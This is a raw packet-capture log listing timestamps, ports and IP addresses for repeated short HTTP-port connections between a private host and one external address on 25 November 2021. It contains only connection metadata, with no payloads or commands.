Nov 25, 2021 10:52:43.624345064 CET	50383	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.658364058 CET	80	50383	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.658546925 CET	50383	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.692533970 CET	80	50383	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.713879108 CET	80	50383	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.713933945 CET	80	50383	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:43.714227915 CET	50383	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.714313030 CET	50383	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:43.748672009 CET	80	50383	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.034178019 CET	50384	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.067629099 CET	80	50384	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.067892075 CET	50384	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.069422960 CET	50384	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.102817059 CET	80	50384	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.103107929 CET	50384	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.136450052 CET	80	50384	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.152900934 CET	80	50384	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.152949095 CET	80	50384	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.153162003 CET	50384	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.153213024 CET	50384	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.186671019 CET	80	50384	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.466625929 CET	50385	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.500322104 CET	80	50385	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.500461102 CET	50385	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.502012014 CET	50385	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.535799026 CET	80	50385	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.535923004 CET	50385	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.569652081 CET	80	50385	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.604295015 CET	80	50385	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.604342937 CET	80	50385	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.604656935 CET	50385	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.604800940 CET	50385	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:44.638839006 CET	80	50385	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:44.991942883 CET	50386	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.025911093 CET	80	50386	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.026089907 CET	50386	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.027630091 CET	50386	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.061405897 CET	80	50386	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.061568022 CET	50386	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.095391989 CET	80	50386	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.121598959 CET	80	50386	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.121624947 CET	80	50386	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.121824026 CET	50386	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.121840954 CET	50386	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.155637026 CET	80	50386	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.476234913 CET	50387	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.509632111 CET	80	50387	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.509891033 CET	50387	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.511486053 CET	50387	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.545080900 CET	80	50387	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.545258999 CET	50387	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.578643084 CET	80	50387	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.601075888 CET	80	50387	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.601147890 CET	80	50387	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.601334095 CET	50387	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.601371050 CET	50387	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:45.634821892 CET	80	50387	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:45.986716986 CET	50388	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.020097017 CET	80	50388	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.020313978 CET	50388	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.026917934 CET	50388	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.060470104 CET	80	50388	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.060653925 CET	50388	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.094273090 CET	80	50388	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.110552073 CET	80	50388	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.110615969 CET	80	50388	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.110809088 CET	50388	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.110918999 CET	50388	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.144444942 CET	80	50388	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.503591061 CET	50389	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.537627935 CET	80	50389	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.537923098 CET	50389	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.539469004 CET	50389	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.573635101 CET	80	50389	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.573848009 CET	50389	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.608185053 CET	80	50389	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.624283075 CET	80	50389	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.624347925 CET	80	50389	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:46.624505043 CET	50389	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.624569893 CET	50389	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:46.658730030 CET	80	50389	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.014152050 CET	50390	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.047561884 CET	80	50390	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.047842026 CET	50390	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.049388885 CET	50390	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.082798004 CET	80	50390	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.083055019 CET	50390	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.116485119 CET	80	50390	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.133569956 CET	80	50390	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.133618116 CET	80	50390	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.133900881 CET	50390	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.133930922 CET	50390	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.167284966 CET	80	50390	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.451963902 CET	50391	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.485810995 CET	80	50391	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.486016989 CET	50391	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.487560034 CET	50391	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.521455050 CET	80	50391	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.521631002 CET	50391	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.555674076 CET	80	50391	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.595679998 CET	80	50391	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.595727921 CET	80	50391	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.596015930 CET	50391	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.596074104 CET	50391	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:47.630158901 CET	80	50391	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:47.984067917 CET	50392	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.018104076 CET	80	50392	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.018306971 CET	50392	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.019784927 CET	50392	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.053884029 CET	80	50392	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.054059982 CET	50392	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.088197947 CET	80	50392	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.105878115 CET	80	50392	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.105928898 CET	80	50392	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.106066942 CET	50392	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.106121063 CET	50392	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.140537024 CET	80	50392	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.506171942 CET	50393	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.539654016 CET	80	50393	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.539922953 CET	50393	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.541433096 CET	50393	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.574812889 CET	80	50393	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.575031996 CET	50393	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.608567953 CET	80	50393	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.624253988 CET	80	50393	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.624308109 CET	80	50393	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:48.624587059 CET	50393	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.624670982 CET	50393	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:48.658415079 CET	80	50393	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.018565893 CET	50394	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.052675962 CET	80	50394	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.053023100 CET	50394	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.054536104 CET	50394	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.088455915 CET	80	50394	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.088676929 CET	50394	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.122941971 CET	80	50394	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.138618946 CET	80	50394	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.138674974 CET	80	50394	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.138897896 CET	50394	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.138952017 CET	50394	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.173255920 CET	80	50394	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.519395113 CET	50395	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.552845001 CET	80	50395	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.553143978 CET	50395	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.554647923 CET	50395	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.588001013 CET	80	50395	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.588211060 CET	50395	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.621634007 CET	80	50395	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.638241053 CET	80	50395	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.638293028 CET	80	50395	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:49.638458014 CET	50395	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.638509035 CET	50395	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:49.671988010 CET	80	50395	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.064856052 CET	50396	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.098429918 CET	80	50396	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.098612070 CET	50396	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.100164890 CET	50396	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.133472919 CET	80	50396	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.133907080 CET	50396	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.167105913 CET	80	50396	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.190781116 CET	80	50396	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.190831900 CET	80	50396	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.191015005 CET	50396	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.191076040 CET	50396	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.224312067 CET	80	50396	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.584083080 CET	50397	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.618165970 CET	80	50397	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.618419886 CET	50397	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.619972944 CET	50397	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.653948069 CET	80	50397	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.654148102 CET	50397	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.688213110 CET	80	50397	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.709996939 CET	80	50397	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.710053921 CET	80	50397	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:50.710231066 CET	50397	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.710283995 CET	50397	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:50.744486094 CET	80	50397	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.078764915 CET	50398	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.112219095 CET	80	50398	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.112468958 CET	50398	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.114068985 CET	50398	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.147639036 CET	80	50398	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.147906065 CET	50398	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.181494951 CET	80	50398	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.201992035 CET	80	50398	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.202048063 CET	80	50398	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.202193975 CET	50398	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.202250957 CET	50398	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.235765934 CET	80	50398	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.590883970 CET	50399	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.624258995 CET	80	50399	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.624531984 CET	50399	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.626205921 CET	50399	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.659363031 CET	80	50399	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.659531116 CET	50399	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.693062067 CET	80	50399	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.708842039 CET	80	50399	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.708905935 CET	80	50399	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:51.709213972 CET	50399	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.709311962 CET	50399	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:51.742880106 CET	80	50399	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.036504030 CET	50400	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.070333958 CET	80	50400	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.070473909 CET	50400	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.072016001 CET	50400	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.105906963 CET	80	50400	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.106101990 CET	50400	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.140026093 CET	80	50400	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.156078100 CET	80	50400	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.156100035 CET	80	50400	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.156251907 CET	50400	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.156272888 CET	50400	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.190165043 CET	80	50400	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.530270100 CET	50401	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.563417912 CET	80	50401	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.563657999 CET	50401	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.565167904 CET	50401	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.598375082 CET	80	50401	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.598584890 CET	50401	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.631958961 CET	80	50401	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.649394035 CET	80	50401	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.649444103 CET	80	50401	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.649611950 CET	50401	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.649665117 CET	50401	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:52.683186054 CET	80	50401	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:52.988118887 CET	50402	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.022177935 CET	80	50402	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.022649050 CET	50402	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.024229050 CET	50402	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.058211088 CET	80	50402	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.058341026 CET	50402	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.092375040 CET	80	50402	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.112158060 CET	80	50402	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.112236023 CET	80	50402	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.112433910 CET	50402	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.112493992 CET	50402	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.146454096 CET	80	50402	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.431493998 CET	50403	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.465584993 CET	80	50403	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.465795040 CET	50403	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.467348099 CET	50403	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.501369953 CET	80	50403	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.501653910 CET	50403	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.535831928 CET	80	50403	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.551305056 CET	80	50403	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.551357985 CET	80	50403	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.551527977 CET	50403	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.551579952 CET	50403	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.585761070 CET	80	50403	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.938786983 CET	50404	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.972312927 CET	80	50404	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:53.972585917 CET	50404	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:53.974143028 CET	50404	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.007487059 CET	80	50404	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.007693052 CET	50404	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.041208982 CET	80	50404	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.057122946 CET	80	50404	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.057174921 CET	80	50404	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.057344913 CET	50404	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.057398081 CET	50404	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.090959072 CET	80	50404	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.451498985 CET	50405	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.485542059 CET	80	50405	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.485889912 CET	50405	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.487405062 CET	50405	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.521383047 CET	80	50405	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.521599054 CET	50405	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.555613041 CET	80	50405	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.571399927 CET	80	50405	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.571448088 CET	80	50405	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.571620941 CET	50405	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.571670055 CET	50405	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.605906963 CET	80	50405	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.947432995 CET	50406	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.980900049 CET	80	50406	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:54.981132984 CET	50406	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:54.982707977 CET	50406	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.016052961 CET	80	50406	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.016263962 CET	50406	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.049665928 CET	80	50406	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.065568924 CET	80	50406	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.065618992 CET	80	50406	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.065788984 CET	50406	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.065840006 CET	50406	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.099423885 CET	80	50406	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.530925989 CET	50407	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.563935995 CET	80	50407	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.564208031 CET	50407	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.566183090 CET	50407	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.599220991 CET	80	50407	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.599354029 CET	50407	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.632396936 CET	80	50407	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.648091078 CET	80	50407	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.648101091 CET	80	50407	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:55.648585081 CET	50407	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.648595095 CET	50407	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:55.681627989 CET	80	50407	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.012399912 CET	50408	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.045630932 CET	80	50408	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.045759916 CET	50408	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.047377110 CET	50408	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.080426931 CET	80	50408	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.080729008 CET	50408	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.113970995 CET	80	50408	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.129972935 CET	80	50408	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.130022049 CET	80	50408	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.130243063 CET	50408	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.130291939 CET	50408	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.163697004 CET	80	50408	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.490322113 CET	50409	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.524472952 CET	80	50409	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.524739027 CET	50409	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.526257038 CET	50409	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.560524940 CET	80	50409	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.560775042 CET	50409	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.594820976 CET	80	50409	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.611107111 CET	80	50409	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.611155033 CET	80	50409	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.611413002 CET	50409	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.611463070 CET	50409	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:56.645464897 CET	80	50409	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:56.988723040 CET	50410	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.022859097 CET	80	50410	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.023086071 CET	50410	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.024559021 CET	50410	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.058561087 CET	80	50410	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.058769941 CET	50410	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.092855930 CET	80	50410	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.109306097 CET	80	50410	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.109358072 CET	80	50410	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.109508038 CET	50410	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.109565973 CET	50410	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.143676996 CET	80	50410	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.494618893 CET	50411	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.528100014 CET	80	50411	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.528317928 CET	50411	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.529844999 CET	50411	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.563234091 CET	80	50411	176.223.209.128	192.168.11.20
Nov 25, 2021 10:52:57.563415051 CET	50411	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:52:57.596879959 CET	80	50411	176.223.209.128	192.168.11.20
